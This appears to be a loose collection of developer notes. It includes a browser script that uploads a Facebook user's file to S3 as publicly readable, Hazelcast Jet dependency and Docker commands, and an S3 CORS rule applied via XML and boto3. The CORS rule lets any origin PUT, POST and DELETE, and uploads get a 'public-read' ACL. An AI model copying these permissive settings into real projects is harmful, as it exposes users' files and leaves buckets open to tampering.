      var button = document.getElementById('upload-button');
      var results = document.getElementById('results');
      button.addEventListener('click', function () {
        var file = fileChooser.files[0];
        if (file) {
          results.innerHTML = '';
          // The object key will be facebook-USERID/FILE_NAME
          var objKey = 'facebook-' + fbUserId + '/' + file.name;
          var params = {
            Key: objKey,
            ContentType: file.type,
            Body: file,
            ACL: 'public-read'
          };
          bucket.putObject(params, function (err, data) {
            if (err) {
              results.innerHTML = 'ERROR: ' + err;
            } else {
              listObjs();
            }
          });
        }
      });

 

               

            

        

       

       

Hazelcast

pom.xml:

<dependencies>
  <dependency>
    <groupId>com.hazelcast.jet</groupId>
    <artifactId>hazelcast-jet</artifactId>
    <version>0.5</version>
  </dependency>

</dependencies>

Command:

compile 'com.hazelcast.jet:hazelcast-jet:0.5'

 

Pull the image from the Docker registry via this command:

docker pull hazelcast/hazelcast-jet

Then run the Hazelcast Jet Docker image by:

docker run -ti hazelcast/hazelcast-jet

S3 CORS Rule

CORSConfiguration

<?xml version="1.0" encoding="UTF-8"?>
<CORSConfiguration xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <CORSRule>
    <AllowedOrigin>*</AllowedOrigin>
    <AllowedMethod>GET</AllowedMethod>
    <AllowedMethod>PUT</AllowedMethod>
    <AllowedMethod>POST</AllowedMethod>
    <AllowedMethod>DELETE</AllowedMethod>
    <AllowedHeader>*</AllowedHeader>
  </CORSRule>
</CORSConfiguration>
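The same rule can also be applied programmatically; here is a hedged boto3 sketch (the bucket name is a placeholder):

# Apply the CORS rule above with boto3's put_bucket_cors
import boto3

s3 = boto3.client("s3")
s3.put_bucket_cors(
    Bucket="messtone-bucket",
    CORSConfiguration={
        "CORSRules": [
            {
                "AllowedOrigins": ["*"],
                "AllowedMethods": ["GET", "PUT", "POST", "DELETE"],
                "AllowedHeaders": ["*"],
            }
        ]
    },
)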